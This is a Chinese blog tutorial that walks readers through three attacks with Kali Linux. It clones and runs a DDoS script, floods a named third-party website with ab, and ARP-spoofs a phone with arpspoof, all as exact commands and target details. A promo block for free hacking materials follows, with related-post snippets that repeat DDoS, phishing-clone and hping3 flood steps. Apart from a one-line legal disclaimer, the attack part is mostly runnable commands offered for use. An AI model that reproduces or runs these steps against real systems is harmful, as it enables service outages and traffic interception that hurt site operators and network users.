Kali Linux三种网络攻击方法总结(DDoS、CC和ARP欺骗)

已于 2024-01-05 21:59:21 修改
阅读量3.8k 收藏 91
点赞数 8
分类专栏: 网络攻击 Kali Linux DDoS 文章标签: linux ddos 运维 DDoS 网络攻击 信息网络安全
于 2023-07-12 16:59:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74942241/article/details/131685886
版权
本文详细介绍了如何在KaliLinux2020-4-installer-amd64版本中执行DDoS、CC攻击以及ARP欺骗。通过命令行操作,展示了DDoS攻击的数据包下载与执行,CC攻击的ab工具使用,以及ARP欺骗的dsniff安装和arpspoof命令的运用。同时强调了正确使用这些工具的重要性,警告读者避免违法行为。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文章使用的是Kali Linux的2020-4-installer-amd64版本,其他版本是否兼容我会尽快测试,如果你想更快知道你所用的版本是否兼容,可以在下面留言,我会在看到信息后的第一时间回复的!

Kali Linux的安装过程本文章不做过多说明,请自行百度

一、DDos攻击

首先,打开一个命令行

img

输入以下命令:

git clone https://github.com/Andysun06/ddos

提示如图所示

img

这样,用于DDos的数据包就已经下载到了你的Kali上

下面,进入你所下载的DDos文件夹,输入命令(注意大小写):

cd ddos

img

本文用于演示的kali是2020年版本,用python执行ddos-p2.py,输入命令:

python ddos-p2.py

界面会如下图所示:

img

然后输入攻击对象的IP(本教程以我的博客为例)

再打开一个命令行窗口:

img

输入命令:

ping andysun06.gitee.io

img

即可获得攻击对象的IP地址。(获取IP后Ctrl+C可以结束ping)

然后回到刚刚的命令行窗口,输入ping到的IP地址:

img

Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)

Attack Speed即攻击速度,数值越大越快,最大不能超过1000

img

按下回车,如果出现以下界面,即代表已经开始向该IP发起DDos攻击,也就成功了。

img

二、CC攻击

首先打开一个命令行窗口

img

先获得root权限,输入以下命令:

sudo su

img

然后输入你的账号密码(注意:输入后不会显示出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)

img

然后输入以下命令:

ab -n 参数1 -c 参数2 网站地址

参数一是并发数(请求的用户量)

参数二是发送总量(请求的总次数)

(有兴趣的可以在百度上另外学习)

参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例:

img

出现如上界面即代表已经对目标网址开始了CC攻击,如果出现如下界面,即代表CC攻击完成:

img

三、ARP欺骗

首先,ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

apt-get install dsniff

当然,有可能会遇到部分数据包安装错误的情况,如果你遇到了这种情况,可以参考这个博文:Kali Linux 2020中使用arpspoof

如果你已经安装了dsniff数据包,就可以开始ARP欺骗了,首先,通过以下命令确定你的网卡名称和IP地址:

ifconfig

img

然后嗅探你所在WLAN下所有设备的IP地址,命令如下:

fping -g 本机IP地址/24

例如我的IP是192.168.0.101,命令就是fping -g 192.168.0.101/24

img

我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,

先获得root权限,输入以下命令:

sudo su

img

然后输入你的账号密码(注意:输入后不会回显出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)

img

然后输入以下命令:

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0,攻击目标就是我的手机,IP是192.168.0.100,手机的网关就是192.168.0.1(就是IP的最后一位改为1),于是我的攻击命令就是:

arpspoof -i eth0 -t 192.168.0.100 192.168.0.1

按下回车,如果出现下图回显,就说明正在攻击

img

现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。

如果你想停止攻击,就按下Ctrl+Z,攻击就停止了。

其他版本教程等待更新(预计11月14号前)

请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负

读者福利:知道你对网络安全感兴趣,便准备了这套网络安全的学习资料

👉[[[优快云大礼包:《黑客&网络安全入门&进阶学习资源》免费分享]]]安全链接,放心点击

对于0基础小白入门:

如果你是零基础小白,想快速入门网络安全是可以考虑的。
一方面是学习时间相对较短,学习内容更全面更集中。
二方面是可以找到适合自己的学习方案

包括: 网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。 带你从零基础系统性的学好网络安全!

👉网安学习成长路线图、网安视频合集👈

Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。(全套教程文末领取哈)

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

👉精品网安学习书籍👈

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

👉网络安全源码合集+工具包👈

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

👉CTF项目实战👈

学习网安技术最忌讳纸上谈兵,而在项目实战中,既能学习又能获得报酬的CTF比赛无疑是最好的试金石!

在这里插入图片描述

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述
这份完整版的学习资料已经上传优快云,朋友们如果需要可以微信扫描下方优快云官方认证二维码免费领取【保证100%免费】

kali DDOS攻击
程序猿的博客
01-05 3万+
本次文章发动DDOS攻击的是Github上的Python脚本 Paylod:https://github.com/Ha3MrX/DDos-Attack 首先从Github克隆到本地: Bash git clone https://github.com/Ha3MrX/DDos-Attack   然后进入DDos-Attack这个目录: Bash cd DDos-Attack ...
Kali Linux发动DDOS攻击
qq_64868579的博客
06-11 4266
DHCP通常被应用在大型局域网中,主要作用是集中地管理、分配IP地址,使网络环境中的主机动态地获取IP地址、网关地址、DNS服务器地址等信息,并能够提升地址的使用率。DHCP攻击的目标也是服务器,怀有恶意攻击的攻击者伪造大量DHCP请求发送到服务器,这样DHCP服务器地址池中的IP地址很快就会分配完,从而导致合法用户无法申请到IP地址。执行攻击后,Yersinia会在本网段内不停发送请求数据包,很快HDCP服务器地址池内所有的有效IP地址都无法使用,新的用户将无法获取IP地址,整个网络陷入瘫痪状态。
基于Kali的一次DDos攻击实践
m0_60028455的博客
02-24 2万+
镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 一、什么是DDos攻击 DDOS(Distributed Denial of Service),即分布式拒绝服务,是一种针对于网络服务的攻击行为。对于 DDOS 我们可以这样通俗地理解,假如有一家商店在售卖商品,突然涌过来一大帮人说要买东西,这里面有的人是真正的顾客,有的人只是过来捣乱的,但是售货员可能就会崩溃了(不知道该卖给谁),就会导致一种拒绝服务攻击了。而分布式拒绝服务攻击,则是因为黑客控制了很多台肉鸡来发动攻击。这种攻击近些年来越来越流行,对于
使用kali进行DDos攻击
相关项目可以查看https://gitee.com/fan-pl或https://github.com/fpl1116
04-23 1924
使用kali进行DDos攻击
如何使用Kali Linux三种网络命令方法(DDoSCCARP进入自己手机)
最新发布
qq_41314882的博客
02-15 782
特别是,“netstat -r”命令可以实现与“route”命令相同的功能,即显示Linux系统中的路由信息(路由表)。以上内容仅供参考,如需更详细的信息,建议查阅Kali Linux的官方文档或相关网络论坛。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。route命令:route命令用于显示当前Linux系统中的路由信息,包括当前主机所在的子网默认网关的地址。攻击目标就是我的手机IP是192.168.0.100;
Kali对网站进行DDOS攻击
X_Walter的博客
10-19 8764
下载相应的脚本文件 git clone https://github.com/Ha3MrX/DDOs-Attack * 进入下载的目录,对脚本加入执行权限: cd DDOs-Attack/ chmod +x ddos-attack.py * 用脚本进行DDOS攻击: python ddos-attack.py 写入相应的网址以及端口,开始攻击 ...
kali使用ddos攻击
weixin_55357256的博客
07-23 1616
回车打开ddos程序,它会先让我们输入被攻击的ip地址,新建一个终端,这里我输入的是我自己的网站,如果不知道服务器的IP地址是什么,可以使用ping扫描,括号里的就是IP地址。文件下载完成后在终端 输入cd 0kilobyte/ddos读取文件夹,再输入Python ddos.py打开文件。打开终端,进入root,输入apt install git加载git,如之前加载过,这一步可以跳过。DDoS 攻击通过向目标服务器发送大量的请求,使服务器资源被耗尽,无法处理合法用户的请求,从而导致。
kali LinuxDDos攻击(详细教程)
weixin_66727473的博客
10-30 9936
本文章使用的是Kali Linux的2021-1的版本。vm虚拟机里kali安装我就不做说明了,相信各位可以的不会的可以私聊本作者。请正确使用DDos不要用来做违反当地法律法规的事情,否则后果自负。DDos攻击首先打开我们kali Linux里的命令行如果有kali模式的话我们要先切换到root模式切记kali的密码是不显示的大部分账号密码都是一致的 接下来输入以下命令:这样DDos的数据包就已经下载到了你的Kali上 下面进入你所下载的DDos文件夹 (注意字母大小写)然后用python执行 如果进入了
Kali Linux 三种网络攻击方法总结(DDoSCC ARP 欺骗
2301_77160226的博客
08-15 2983
Kali Linux 作为一款专为网络安全专业人员爱好者设计的操作系统,提供了丰富的工具来模拟研究各种网络攻击手段。本文将深入探讨三种常见的网络攻击方法DDoS(分布式拒绝服务)、CC(Challenge Collapsar) ARP 欺骗,并详细阐述其原理、常用工具、实际操作示例以及相应的防范措施。
kalikali常见攻击手段
2403_83442903的博客
06-03 737
至此,后门植入成功!它通常被用来伪造邮件,进行钓鱼、社工等操作。如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。我们将账号密码都设为admin,点击登陆,发现有跳转到了真正的页面,也不会返回账号信息错误的界面,同时,kali也将我们输入的信息截获了,并在终端显示。通常是应用层攻击,攻击对象是网页,涉及的协议主要是HTTP,HTTPS,消耗的是服务器的CPU资源(通过请求大量调用CPU的资源,例如查询数据库)
网络安全-DoS与DDoS攻击原理(TCP、UDP、CC攻击等)与防御_简述dosddos的攻击原理防范措施
2401_84247760的博客
04-29 1048
DoS,是的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击连通性攻击。一般是使用一台计算机进行攻击。
Kali Linux 渗透测试之拒绝服务攻击及防御
lvwuwei的博客
05-03 3132
作为渗透测试人员,有时候需要对客户的系统进行DDOS攻击测试,那么这个时候就需要我们有一款合格的测试工具。而在Kali Linux上就集成了一些DDOS测试工具供测试者使用,下面就简单介绍一些测试工具。 kali下的拒绝服务攻击: D(D)OS…1 yersinia…2 hping3…3 使用metasploit进行SynFlood攻击…4 WEB DOS(压力测试)…5 1.DOS(DDOS...
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍中文翻译。
kali新手入门教学(11)--ddos攻击
azraelxuemo的博客
05-25 9203
DDOS 全名是 Distribution Denial of service (分布式拒绝服务攻击),指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动 DoS 攻击,从而成倍地提高拒绝服务攻击的威力。 通常,攻击者使用一个偷窃帐号将 DDoS 主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在 Internet 上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术, 主控程序能在几秒钟内激活成百上千次代理程序的运行
Kali Linux Web 渗透测试秘籍 第九章 客户端攻击社会工程
热门推荐
龙哥盟
10-13 4万+
第九章 客户端攻击社会工程 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介我们目前所见的大部分技巧都尝试利用服务端的漏洞或设计缺陷,并访问它来从数据库中提取信息。有另外不中攻击,使用服务器来利用用户软件上的漏洞,或者尝试欺骗用户来做一些他们通常情况下不会做的事情,以便获得用户拥有的信息。这些攻击就叫做客户端攻
kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
weixin_33724046的博客
10-23 659
一.进入kali linux系统的命令行模式 输入代码; ifconfig 查看获得本机IP地址为:192.168.43.227 然后输入代码: setoolkit 出现以下界面: 在set后输入1. 二.开始重复输入数字代号 三.写入钓鱼网站的目标 正如下图所示,我们需要先输入本机的IP地址以及端口,之后输入钓鱼网站的网...
kali Linux命令大全
qq_41814777的博客
10-15 2万+
Kali Linux 命令集 系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpu...
kali从入门到入狱之使用Hping3进行DDos攻击
qq_56418482的博客
10-11 4833
显示hping in flood mode, no replies will be shown,就说明洪水模式开始了,洪水模式不返回状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值